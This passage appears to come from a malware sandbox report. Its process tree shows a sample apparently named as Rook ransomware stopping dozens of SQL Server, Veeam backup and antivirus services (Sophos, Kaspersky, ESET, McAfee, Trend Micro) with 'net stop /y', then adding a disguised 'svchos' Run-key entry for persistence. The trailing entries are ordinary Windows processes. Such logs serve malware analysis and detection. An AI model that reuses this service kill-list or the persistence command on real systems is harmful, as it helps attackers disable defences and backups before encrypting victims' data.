    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:664
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:2096
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:1960
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:2920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:2820
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:940
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:3548
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:2036
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:3388
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:2072
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:1680
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:772
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:4884
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:3540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:4660
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:4040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:4772
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:3484
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:808
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:1956
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4792
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:3176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:4452
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLBrowser /y
  2⤵
  PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:2812
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:4492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:5056
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:4544
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:4444
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:3252
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:2520
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:3228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:1760
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLWriter /y
  2⤵
  PID:5104
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:5036
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SstpSvc /y
  2⤵
  PID:2256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SstpSvc /y
    3⤵
    PID:3848
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop svcGenericHost /y
  2⤵
  PID:4000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:4872
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_filter /y
  2⤵
  PID:1600
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:4884
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_service /y
  2⤵
  PID:1620
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:2332
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_update_64 /y
  2⤵
  PID:4824
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:2860
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TmCCSF /y
  2⤵
  PID:1952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:772
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop tmlisten /y
  2⤵
  PID:3820
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:4040
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKey /y
  2⤵
  PID:3600
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:3500
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKeyScheduler /y
  2⤵
  PID:3136
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyScheduler /y
    3⤵
    PID:2632
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:4892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:3976
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop UI0Detect /y
  2⤵
  PID:2136
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop UI0Detect /y
    3⤵
    PID:1808
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:1728
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:2248
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:1116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:2224
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:1008
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1004
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:2088
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:2652
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:3056
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:4660
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:3360
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:4124
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:4292
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:1088
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamMountSvc /y
  2⤵
  PID:2908
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamMountSvc /y
    3⤵
    PID:2348
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:4856
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3864
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamRESTSvc /y
  2⤵
  PID:3172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamRESTSvc /y
    3⤵
    PID:4168
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:1696
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:3644
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop W3Svc /y
  2⤵
  PID:4136
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop W3Svc /y
    3⤵
    PID:5076
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop wbengine /y
  2⤵
  PID:992
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:2944
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop WRSVC /y
  2⤵
  PID:208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:4000
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:2780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2104
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:64
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4288
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:2156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:4980
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop swi_update /y
  2⤵
  PID:2096
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:1060
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:4500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:2344
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  2⤵
  PID:4712
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5040
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:3428
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "SQL Backups" /y
  2⤵
  PID:3456
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SQL Backups" /y
    3⤵
    PID:3360
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$PROD /y
  2⤵
  PID:4460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:4812
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop "Zoolz 2 Service" /y
  2⤵
  PID:4360
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "Zoolz 2 Service" /y
    3⤵
    PID:4184
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:2660
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:808
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:5056
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop msftesql$PROD /y
  2⤵
  PID:4304
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:2908
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop NetMsmqActivator /y
  2⤵
  PID:1808
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:2164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetMsmqActivator /y
    3⤵
    PID:1596
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop EhttpSrv /y
  2⤵
  PID:4996
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EhttpSrv /y
    3⤵
    PID:5088
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ekrn /y
  2⤵
  PID:3812
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:3324
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop ESHASRV /y
  2⤵
  PID:3124
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:3388
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:3984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:4872
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:2296
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:2116
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop AVP /y
  2⤵
  PID:3032
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:556
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop klnagent /y
  2⤵
  PID:4524
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:4752
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:2724
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:3252
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:1952
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:1724
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop wbengine /y
  2⤵
  PID:1084
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4136
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop wbengine /y
    3⤵
    PID:4980
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop kavfsslp /y
  2⤵
  PID:5028
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:4288
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop KAVFSGT /y
  2⤵
  PID:4696
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:4824
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop KAVFS /y
  2⤵
  PID:208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:2332
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" stop mfefire /y
  2⤵
  PID:2540
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfefire /y
    3⤵
    PID:64
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe" /f
  2⤵
  PID:1324
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4892
- - C:\Windows\system32\reg.exe
    REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "svchos" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\2024-12-05_6d7d0a07024e8e61ed94a14b96490f81_rook.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:3292

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1064

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:956

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:3252

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4980

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2360

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:15384
- C:\Windows\explorer.exe
  explorer.exe /LOADSAVEDWINDOWS
  2⤵
  - Boot or Logon Autostart Execution: Active Setup
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:16420

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:15452

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:17404

C:\Windows\explorer.exe
explorer.exe
1⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
PID:16272

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:13228

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:11996

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:11616

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:13464

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:17672

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:18068

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:9260

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:10752

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:10868

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:18544

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:18820

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:19064

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:19332

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:7900

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:2016

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:5420

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:8112

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
